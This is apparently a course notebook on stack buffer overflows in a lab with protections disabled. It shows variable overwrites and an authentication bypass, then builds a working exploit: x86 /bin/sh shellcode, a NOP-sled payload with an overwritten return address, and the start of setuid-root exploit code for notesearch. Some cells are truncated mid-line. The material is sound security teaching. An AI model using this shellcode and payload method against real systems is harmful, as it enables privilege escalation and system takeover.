# Buffer Overflows

- most Internet worms use buffer overflow vulnerabilities to propagate
- C and C++ assume that programmers are responsible for data integrity
- modern compilers and OSes provide various protections making it harder to exploit traditional buffer overflows
- once the buffer is allocated, there's no built-in mechanism to safeguard the amount of data that can be stored into to
    - this is called buffer overrun or buffer overflow
    - user data may overwrite other part of the memory it's not supposed to making the program behave differently or crashing the program
    - hackers could take advantage of this flaw to control the program and may pawn the system by executing shellcode or payload of their choice
- buffer overflow can violate all three core principles of **CIA** triad - **Confidentiality, Integrity, and Availability**
- **Confidentiality**: allows attackers to read confidential or data that they're not supposed to have access to
- **Integrity**: allows attackers to modify part of the data/program that they're not supposed to
- **Availability**: allows attackes to crash the system (SEGFAULT) violating availbility of the service

- typically two types:
    1. stack overflow
    2. heap overflow

## Disable ASLR and other compiler protections
- compile.sh script disables compiler protections

In [1]:
# if value is 0; ASLR is disabled
! cat /proc/sys/kernel/randomize_va_space

0


In [None]:
# run this on terminal
# can't interactively type sudo password!
! echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

[sudo] password for kali: 

## Program's memory and stack may shift
- depending on how the program is launched, several factors make the program's location in memory shift
    - even after virtual-address space randomization is disabled
- e.g. environment variables, length of program name, argument length to program, etc.

### see the difference between stack_overflow_demo.cpp and stack_overflow_demo1.cpp
- stack_overflow_demo.cpp doesn't take any argument from commandline
    - interactive program that prompts user to enter some text
- stack_overflow_demo1.cpp takes
    - uses argument provided to the program
    - doesn't prompt user
- let's compile and run these programs to see the address of buffer

In [153]:
%%bash
cp ./booksrc/stack_overflow_demo.cpp .
cp ./booksrc/stack_overflow_demo1.cpp .

In [154]:
! cat stack_overflow_demo.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

void bad() {
    char buffer[100];
    printf("buffer is at %p\n", buffer);
    cout << "Enter some text: ";
    cin >> buffer;
    cout << "buffer contains: \n" << buffer << endl;
}

int main(void) {
    bad();
    cout << "Good bye!" << endl;
    return 0;
}

In [155]:
! cat stack_overflow_demo1.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

void bad(char *data) {
    char buffer[100];
    printf("buffer is at %p\n", buffer);
    strcpy(buffer, data);
    cout << "buffer contains: \n" << buffer << endl;
}

int main(int argc, char *argv[]) {
    bad(argv[1]);
    cout << "Good bye!" << endl;
    return 0;
}

### buffer address in stack_overflow_demo.cpp

In [156]:
# let's compile the program and run it
! echo kali | sudo -S ./compile.sh stack_overflow_demo.cpp stack_overflow_demo.exe

[sudo] password for kali: 

In [157]:
# since stack_overflow_demo.exe is an interactive program,
# you must pipe some data into the program on Jupyter Notebook
# On terminal, you can either pipe or interactively type when prompted
! echo "Hello_World" | ./stack_overflow_demo.exe
# Note the address of buffer!

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
Hello_World
Good bye!


In [158]:
! python -c 'print("A"*100)' | ./stack_overflow_demo.exe
# Note the address of buffer!

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [159]:
! python -c 'print("A"*200)' | ./stack_overflow_demo.exe
# Note the address of buffer!

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/bin/bash: line 1: 39852 Done                    python -c 'print("A"*200)'
     39853 Segmentation fault      | ./stack_overflow_demo.exe


- Notice the same address for buffer in stack_overflow_demo.exe no matter how long the user-entered text is

## buffer address in stack_overflow_demo1.cpp
- compile and run the program and notice the address of buffer at different location

In [160]:
! echo kali | sudo -S ./compile.sh stack_overflow_demo1.cpp stack_overflow_demo1.exe

[sudo] password for kali: 

In [161]:
# run the program with an argument
# Note you CAN'T pipe the argument into the program as in previous example!
! ./stack_overflow_demo1.exe "Hello World"
# Note the address of buffer

buffer is at 0xffffc2bc
buffer contains: 
Hello World
Good bye!


In [162]:
! ./stack_overflow_demo1.exe "Hello World"
# Note the address of buffer; no change because same program is run with the same length of argument

buffer is at 0xffffc2bc
buffer contains: 
Hello World
Good bye!


In [163]:
! ./stack_overflow_demo1.exe $(python -c 'print("A"*100)')
# Note the address of buffer!

buffer is at 0xffffc26c
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [164]:
! ./stack_overflow_demo1.exe $(python -c 'print("A"*200)')
# Note the address of buffer!

buffer is at 0xffffc20c
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


## length of the program name
- let's give names of different lengths to the same program and notice the address of buffer
- this is true regardless whether the program takes an argument or not 
    - NOTE the name of the program itself is passed as an argument to the program as an environment variable

In [165]:
# let's compile the program and run stack_overflow_demo.cpp
! echo kali | sudo -S ./compile.sh stack_overflow_demo.cpp stack_overflow_demo.exe

[sudo] password for kali: 

In [166]:
! echo "Hello_World" | ./stack_overflow_demo.exe

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
Hello_World
Good bye!


In [167]:
# if the same program is run multiple times, 
! echo "Hello_World" | ./stack_overflow_demo.exe
# Notice no change in buffer address

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
Hello_World
Good bye!


In [168]:
# let's compile the program and run stack_overflow_demo.cpp
! echo kali | sudo -S ./compile.sh stack_overflow_demo.cpp stack.exe

[sudo] password for kali: 

In [169]:
! echo "Hello_World" | ./stack.exe

buffer is at 0xffffc30c
Enter some text: buffer contains: 
Hello_World
Good bye!


In [170]:
# let's compile the program and run stack_overflow_demo.cpp; output program name is stack1.exe
! echo kali | sudo -S ./compile.sh stack_overflow_demo.cpp stack1.exe

[sudo] password for kali: 

In [171]:
! echo "Hello_World" | ./stack1.exe

buffer is at 0xffffc30c
Enter some text: buffer contains: 
Hello_World
Good bye!


In [172]:
# let's compile the program and run stack_overflow_demo.cpp; output program name is stack11.exe
! echo kali | sudo -S ./compile.sh stack_overflow_demo.cpp stack11.exe

[sudo] password for kali: 

In [173]:
! echo "Hello_World" | ./stack11.exe
# perhaps, filename is not long engouh to make a difference

buffer is at 0xffffc30c
Enter some text: buffer contains: 
Hello_World
Good bye!


In [174]:
%%bash
# let's compile the program and run stack_overflow_demo.cpp; output program name is stack11111.exe
echo kali | sudo -S ./compile.sh stack_overflow_demo.cpp stack11111.exe
echo "Hello_World" | ./stack11111.exe

buffer is at 0xffffc2fc
Enter some text: buffer contains: 
Hello_World
Good bye!


[sudo] password for kali: 

## Stack Overflow
- overrun in stack segment
- let's use some programs to demonstrate various consequences of stackoverflow

## Some consequences of stack overflow

1. overwrite variable(s) with the data of your choice (Integrity)
- change the flow of the program (Integrity)
- remote code execution (Integrity, Confidentiality, Availability)

### 1. overwrite variables with the data of your choice
- demo program: booksrc/overflow_example.cpp

In [14]:
# let's copy overflow_example.cpp to the current folder
! cp booksrc/overflow_example.cpp .

In [15]:
# let's looks at the content of overlfow_example.cpp
! cat overflow_example.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

int main(int argc, char *argv[]) {
	int num = 5;
	char buffer_one[8], buffer_two[8];

	strcpy(buffer_one, "one"); /* copy "one" into buffer_one */
	strcpy(buffer_two, "two"); /* copy "two" into buffer_two */
	
	printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
	printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
	printf("[BEFORE] num is at %p and is %d (0x%08x)\n", &num, num, num);

	printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));
	strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

	printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
	printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
	printf("[AFTER] num is at %p and is %d (0x%08x)\n", &num, num, num);
    return 0;
}


### draw stack of main to answer the following questions
- what is the order of the variables pushed?
- when argv[1] is copied to buffer_two, what may happen to other variables?
- compile and run the program with some arguments

In [16]:
! ./compile.sh booksrc/overflow_example.cpp overflow_example.exe

In [17]:
! ./overflow_example.exe
# segfault is bad!! provide some argument

[BEFORE] buffer_two is at 0xffffc33c and contains 'two'
[BEFORE] buffer_one is at 0xffffc344 and contains 'one'
[BEFORE] num is at 0xffffc34c and is 5 (0x00000005)


In [19]:
# run the program providing some argument
! ./overflow_example.exe hello
# notice the addresses of variables are shifted

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 5 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'hello'
[AFTER] buffer_one is at 0xffffc334 and contains 'one'
[AFTER] num is at 0xffffc33c and is 5 (0x00000005)


In [20]:
# try a few some other values like 15 As
! ./overflow_example.exe $(python3 -c 'print("A"*15, end="")')
# observe the values of buffer_two and buffer_one, and num

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 15 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAA'
[AFTER] num is at 0xffffc33c and is 5 (0x00000005)


In [21]:
# try 16 As
! ./overflow_example.exe $(python3 -c 'print("A"*16, end="")')
# observe the values of buffer_two and buffer_one, and num
# num is 0 which is ascii value of NULL

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 16 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAA'
[AFTER] num is at 0xffffc33c and is 0 (0x00000000)


- try to overwrite int value variable with "BCDE"
- how may bytes is value away from buffer_two?
- find the difference between the address of value and buffer_two

In [22]:
# try 16As and notice the int value variable
! ./overflow_example.exe $(python3 -c 'print("A"*16 + "BCDE", end="")')
# notice the value of num in hex printed 'EDCB', why?

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAABCDE'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAABCDE'
[AFTER] num is at 0xffffc33c and is 1162101570 (0x45444342)


In [23]:
# subtract the address of buffer_two from the address of value
# which variable is at higher location?
! echo $((0xffffc32c - 0xffffc334))

-8


In [24]:
# now try overwriting value with BCDE; in the right order
! ./overflow_example.exe $(python3 -c 'print("A"*16 + "BCDE", end="")')
# check if BCDE is in that order...
# remember x86 is little-endian, i.e., smaller byte is stored first

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAABCDE'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAABCDE'
[AFTER] num is at 0xffffc33c and is 1162101570 (0x45444342)


In [25]:
# check the hex values with python; also see the values of buffer_two and buffer_one
chr(int('42', 16))
# B is stored at the end!

'B'

In [27]:
# or find the hex representation of ASCII of B
hex(ord('B'))

'0x42'

In [28]:
# try one more time; using hex values of EDCB
! ./overflow_example.exe $(python3 -c 'print("A"*16 + "\x45\x44\x43\x42", end="")')

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAAEDCB'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAAEDCB'
[AFTER] num is at 0xffffc33c and is 1111704645 (0x42434445)


### 2. change the flow of the program
- use ./booksrc/auth_overflow.cpp program as demo
- authenticate without using actual password
- let's see the contents of auth_overflow.cpp

In [175]:
! cp ./booksrc/auth_overflow.cpp .

In [176]:
! cat ./booksrc/auth_overflow.cpp

#include <cstring>
#include <iostream>

using namespace std;

int check_authentication(char *password) {
	int auth_flag = 0;
	char password_buffer[16];

	strcpy(password_buffer, password);
	
	if(strcmp(password_buffer, "brillig") == 0)
		auth_flag = 1;
	if(strcmp(password_buffer, "outgrabe") == 0)
		auth_flag = 1;

	return auth_flag;
}

int main(int argc, char *argv[]) {
	if(argc < 2) {
		cout << "Usage: " << argv[0] << " password\n";
		exit(0);
	}
	if(check_authentication(argv[1])) {
		cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
		cout << "      Access Granted.\n";
		cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
	} else {
		cout << "\nAccess Denied.\n";
   }
   return 0;
}
	


In [177]:
# let's compile auth_overflow.cpp
! echo kali | sudo -S ./compile.sh auth_overflow.cpp auth_overflow.exe

[sudo] password for kali: 

In [178]:
# run the program; gives help on how to run it properly
! ./auth_overflow.exe

Usage: ./auth_overflow.exe password


In [179]:
# authenticate with password, outgrabe
! ./auth_overflow.exe outgrabe


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [180]:
# authenticate with password, brillig
! ./auth_overflow.exe brillig


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [181]:
# anyother password shouldn't work!
! ./auth_overflow.exe letmein


Access Denied.


### let's authenticate without real password

In [182]:
# since password_buffer is 16 bytes, let's provide 16 As as password
! ./auth_overflow.exe $(python -c 'print("A"*16, end="")')


Access Denied.


In [183]:
# how about 17 As
! ./auth_overflow.exe $(python -c 'print("A"*17, end="")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### draw stack of check_authentication( ) to understand why 17As let's you in

### examine stack using gdb-peda
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context

```bash
$ gdb -q auth_overflow.exe
$ break check_authentication
$ run $(python3 -c 'print("A"*20, end="")')
$ next i
$ x/s password_buffer
$ x/x &auth_flag
$ p/a &password_buffer
$ p/d auth_flag
```

### variables declaration order changed
- can you overflow if the variable declaration orders are switched?
- normally, variables are pushed on the stack as they're loaded from top to bottom
    - the last variable decalred will be pushed last on the top of the stack
- compile and examine booksrc/auth_overflow2.cpp
- draw stack
- verify it using GDB

In [184]:
# copy booksrc/auth_overflow2.cpp
! cp ./booksrc/auth_overflow2.cpp .

In [185]:
# let's see the source code of booksrc/auth_overflow2.c
! cat auth_overflow2.cpp

#include <cstring>
#include <iostream>

using namespace std;

int check_authentication(char *password) {
    char password_buffer[16];
    int auth_flag = 0;

	strcpy(password_buffer, password);
	
	if(strcmp(password_buffer, "brillig") == 0)
		auth_flag = 1;
	if(strcmp(password_buffer, "outgrabe") == 0)
		auth_flag = 1;

	return auth_flag;
}

int main(int argc, char *argv[]) {
	if(argc < 2) {
		cout << "Usage: " << argv[0] << " password\n";
		exit(0);
	}
	if(check_authentication(argv[1])) {
		cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
		cout << "      Access Granted.\n";
		cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
	} else {
		cout << "\nAccess Denied.\n";
   }
   return 0;
}
	


In [186]:
# let's compile the program
! ./compile.sh booksrc/auth_overflow2.cpp auth_overflow2.exe

In [187]:
# run the program with 17As
! ./auth_overflow2.exe $(python3 -c 'print("A"*17, end="")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### well, how is it possible?
- see in gdb where auth_flag is compared to password_buffer
- turns out auth_flag is still at higher address (pushed before) compared to password_buffer
- compiler optimization? (I don't have clear answer to why!)
- if auth_flag is in lower address compared to password_buffer, you can't overwrite it by oveflowing password_buffer
    - see Hacking textbook explanation

### control return to the right block to authenticate  
- overflow the return address to bypass check_authentication() condition in main and directly execute the true block
- possible in older gcc/assembly version (Hacking LiveCD)
- couldn't get it to work on newer system (tested on Kali (4-19-0)!
- let's assemble and look at the return instruction...
- repeated instructions add esp, 0x10 and sub esp, 0xc makes it hard to jump into the right instruction

### can return to "    access granted     " line
- find the address add esp, 0x10 before the addres to "access granted"
- use that address to overwrite the return address with
- find the offset from password_buffer to return address (32 bytes)
    - subtract the the address of password_buffer from the address of return address
    - or use gdb peda
    
```bash
$ pattern arg 100 # create a pattern of 100 and set as the argument
$ run
    - run the program until segfault
$ patts
    - see EIP offset which is the return address

```

## 3. Remote code execution
- inject and execute shellcode
- shellcode is a program that gives you shell/terminal on the system
- we'll use a vulnerable program booksrc/stack_overflow_demo.cpp
- let's look at an example program that spawns shell/terminal on the system by calling system call
    - copy, compile and run booksrc/system_shell.cpp program with /bin/sh argument

### Example of code that spawns shell/terminal
- high-level code example, using system API

In [192]:
! cp ./booksrc/system_shell.cpp .

In [193]:
! cat system_shell.cpp

#include <cstdlib>
#include <iostream>
#include <cstring>

using namespace std;

int main(int argc, char* argv[]) {
    char buffer[100];
    strcpy(buffer, argv[1]);
    system(buffer);
    cout << "Good bye!";
    return 0;
}

In [194]:
! echo kali | sudo -S ./compile.sh system_shell.cpp system_shell.exe

[sudo] password for kali: 

- run system_shell.exe from terminal
    - Jupyter notebook doesn't give shell/terminal
    
- shellcode:
    - typically is not bash command
    - is executable binary when executed gives shell/terminal
    - if stored in stack as a part of buffer, stack must be Executable!
        - so the buffer can be treated as executable code

In [195]:
! cp booksrc/stack_overflow_demo.cpp .

In [196]:
# let's look at the source
# program simply copies and prints the user provided argument
! cat stack_overflow_demo.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

void bad() {
    char buffer[100];
    printf("buffer is at %p\n", buffer);
    cout << "Enter some text: ";
    cin >> buffer;
    cout << "buffer contains: \n" << buffer << endl;
}

int main(void) {
    bad();
    cout << "Good bye!" << endl;
    return 0;
}

In [197]:
# let's compile and execute the program
! ./compile.sh stack_overflow_demo.cpp stack_overflow_demo.exe

In [202]:
! python3 -c 'print("A"*100, end="")' | ./stack_overflow_demo.exe

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [203]:
# provide a longer argument and see if the program segfaults
! python3 -c 'print("A"*200, end="")' | ./stack_overflow_demo.exe
# Notice "Good bye!"" is not printed!

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/bin/bash: line 1: 44141 Done                    python3 -c 'print("A"*200, end="")'
     44142 Segmentation fault      | ./stack_overflow_demo.exe


### stackoverflow exploitation
#### code execution
- create a payload
- payload typically has the following structure:

```bash
| repeated nop sled | shellcode | repeated return address |
```

### nop sled
- \x90 - no operation instruction in assembly
- if the buffer is large enough, use good number of NOP as a bigger cushion/wider landing zone
- as the stack may shift a bit, it's harder to land exactly where the shellcode is
- NOP let's you slide right to your shellcode that spawns a shell/terminal
- you still need to pad the controlled buffer to make it long enough to overwrite the caller's return address
    
### shellcode
- binary code that actually exploits the vulnerability
- typically spawns, local or remote, tcp connect, reverse connect shell/terminal
- let's you own the system by giving you access to the terminal
  
### repeated return address
- address pointing to some address of repeated nop sled  where it is stored in buffer variable
- this controlled return address should overwrite the caller's return address on stack

### exploit code
- code/program that delivers payload is called exploit code
- provide the exploit code directly to the vulnerable program as an argument
- you can create a exploitcode in Bash, Python, C/C++ to send the payload to the vulnerable program

### 3 example exploit programs
- Bash exploit code is in booksrc/exploit_stackoverflow.sh
- C++ exploit code is in booksrc/exploit_stackoverflow.cpp
- Python2 exploit code is in booksrc/exploit_stackoverflow2.py
    - for now simply use provided exploit code; later learn how to generate the Python 2 template exploit code using PEDA

In [206]:
# directly providing a simple payload to the vulnerable program using bash as seen above
! python3 -c 'print("A"*200, end="")' | ./stack_overflow_demo.exe
# makes the program crash, so 200As is the payload!

buffer is at 0xffffc2dc
Enter some text: buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/bin/bash: line 1: 44411 Done                    python3 -c 'print("A"*200, end="")'
     44412 Segmentation fault      | ./stack_overflow_demo.exe


In [205]:
%%bash
# let's look at the bash exploit code
# note, certain values such as return address will be different in different system
# return must be updated if necessary!
cp booksrc/exploit_stackoverflow.sh .
cat exploit_stackoverflow.sh

cp: cannot stat 'booksrc/exploit_stackoverflow.sh': No such file or directory
cat: exploit_stackoverflow.sh: No such file or directory


CalledProcessError: Command 'b"# let's look at the bash exploit code\n# note, certain values such as return address will be different in different system\n# return must be updated if necessary!\ncp booksrc/exploit_stackoverflow.sh .\ncat exploit_stackoverflow.sh\n"' returned non-zero exit status 1.

In [204]:
%%bash
#  let's look at the exploit code written in Python 2
cp booksrc/exploit_stackoverflow.py .
cat exploit_stackoverflow.py

#!/usr/bin/env python2
#
# Template for local argv exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time

def usage():
    print "Usage: %s target_program" % sys.argv[0]
    return

def pattern(size=1024, start=0):
    try:
        bytes = open("pattern.txt").read(size+start)
        return bytes[start:]
    except:
        return "A"*size

def nops(size=1024):
    return "\x90"*size

def int2hexstr(num, intsize=4):
    if intsize == 8:
        if num < 0:
            result = struct.pack("<q", num)
        else:
            result = struct.pack("<Q", num)
    else:
        if num < 0:
            result = struct.pack("<l", num)
        else:
            result = struct.pack("<L", num)
    return result

i2hs = int2hexstr

def list2hexstr(intlist, intsize=4):
    result = ""
    for value in intlist:
        if isinstance(value, str):
            result += value
        else:
            result += int2hexstr(value, intsize)
    return result



### Modify caller's return address
1. find where the caller's return address is stored on stack
2. find the address of the exploit code that'll be loaded on the stack/buffer
3. modify the return address with the address of the exploit code
4. find the offset that will overwrite the value of the caller's return address
- two ways:
    1. use gdb
    ```bash
    gdb -q stack_overflow_demo.exe
    break bad
    run AAAA
    print $ebp+4
    print &buffer
    print [address of $ebp+4 - &buffer] # note must use hex addresses
    # gives you the offset required to overwrite the caller's return address
    ```
   
    2. use peda pattern search technique as described below

### how was the exploit_stackoverflow.py generated?

### using GDB-PEDA
- create pattern and use as an agrument to the program
- crash the vulnerable program and run pattern search or patts to find offset of return address
    - gdb -q ./stack_overflow_demo.exe
    - pattern arg 200
    - run 
    - after program crashes run
    - patts or pattern search
    - look for EIP+0 or EBP+0 offset + 4
        - `EIP+0 found at offset: 76` 
        - that's the total offset required to overwrite the caller's return address 
        
#### generate skeleton exploit code using GDB-PEDA
    ```bash
    skeleton argv exploit_stackoverflow.py
    ```
    
#### create local linux shellcode 
    ```bash
    shellcode generate x86/linux exec
    ```
- write the generated shellcode to a file
- copy line by line hex values between " " and append it to a binary file

```bash
echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31" > shellcode.bin
echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> shellcode.bin
```

    

In [79]:
! wc -c shellcode.bin

24 shellcode.bin


In [80]:
! hexdump -C shellcode.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


## Using bash to exploit stack_overflow_demo.exe
1. create the payload
2. send payload to the vulnerabale program

#### create payload
- let's say 76 is the total offset
- now, let's create payload buffer with shellcode
    - 48 bytes nop sleds + shellcode (24 bytes) + return address (4 bytes)

In [81]:
# how did we find the size of the nop sled?
print(76-(24+4))

48


In [105]:
# let's create the payload of 76 bytes long, e.g.
! perl -e 'print "\x90"x48' > payload.bin

In [106]:
! cat shellcode.bin >> payload.bin

In [107]:
! ./stack_overflow_demo.exe $(python3 -c 'print("A"*76, end="")')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is at 0xffffc2a0


In [108]:
# find 20 bytes away from the base address of the buffer
! printf "%x" $((0xffffc2a0+20))

ffffc2b4

In [109]:
! perl -e 'print "\xb4\xc2\xff\xff"' >> payload.bin

In [110]:
! wc -c payload.bin

76 payload.bin


In [111]:
! hexdump -C payload.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000030  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000040  c9 89 ca 6a 0b 58 cd 80  b4 c2 ff ff              |...j.X......|
0000004c


### from terminal send the payload
```bash
./stack_overflow_demo.exe $(cat payload.bin)
```
- now the buffer is at different address

In [112]:
! printf "%x" $((0xffffc320+20))

ffffc334

In [113]:
# let's create the payload of 76 bytes long, e.g.
! ./stack_overflow_demo.exe $(perl -e 'print "\x90"x48'; cat 

### booksrc/notesearch.c has stackoverflow vulnerability
- let's look at the source of booksrc/notesearch.c

In [73]:
! cat booksrc/notesearch.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

#define FILENAME "/var/notes"

int print_notes(int, int, char *);   // note printing function
int find_user_note(int, int);        // seek in file for a note for user
int search_note(char *, char *);     // search for keyword function
void fatal(char *);                  // fatal error handler

int main(int argc, char *argv[]) {
	int userid, printing=1, fd; // file descriptor
	char searchstring[100];

	if(argc > 1)                        // If there is an arg
		strcpy(searchstring, argv[1]);   //   that is the search string
	else                                // otherwise
		searchstring[0] = 0;             //   search string is empty

	userid = getuid();
	fd = open(FILENAME, O_RDONLY);   // open the file for read-only access
	if(fd == -1)
		fatal("in main() while opening file for reading");

	while(printing)
		printing = print_notes(fd, userid, searchstring

In [74]:
# lets compile notesearch.c to a binary
! ./compile.sh booksrc/notesearch.c notesearch.exe

[01m[Kbooksrc/notesearch.c:[m[K In function ‘[01m[Kmain[m[K’:
   23 |  userid = [01;35m[Kgetuid[m[K();
      |           [01;35m[K^~~~~~[m[K
   31 |  [01;35m[Kclose[m[K(fd);
      |  [01;35m[K^~~~~[m[K
      |  [32m[Kpclose[m[K
[01m[Kbooksrc/notesearch.c:[m[K In function ‘[01m[Kprint_notes[m[K’:
   45 |  [01;35m[Kread[m[K(fd, note_buffer, note_length); // read note data
      |  [01;35m[K^~~~[m[K
      |  [32m[Kfread[m[K
[01m[Kbooksrc/notesearch.c:[m[K In function ‘[01m[Kfind_user_note[m[K’:
   74 |  [01;35m[Klseek[m[K(fd, length * -1, SEEK_CUR); // rewind file reading by length bytes
      |  [01;35m[K^~~~~[m[K
      |  [32m[Kfseek[m[K


#### notesearch program finds note from /var/notes priviledged folder
- change ownership to root and setuid

```bash
$ sudo chown root:root notesearch.exe
$ sudo chmod +s notesearch.exe
```

In [75]:
# let's see the detail of notesearch.exe
! ls -al notesearch.exe

-rwsr-sr-x 1 root root 19928 Apr 27 13:42 notesearch.exe


In [None]:
! ./notesearch.exe $(perl -e 'print "A"x60')

### notesearch exploit
- booksrc has provide exploit code written in C
- shellcode is modified to work on modern x86 kernel
- let's compile and run the exploit code in terminal

In [77]:
# let's look at the exploit code
! cat booksrc/exploit_notesearch.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
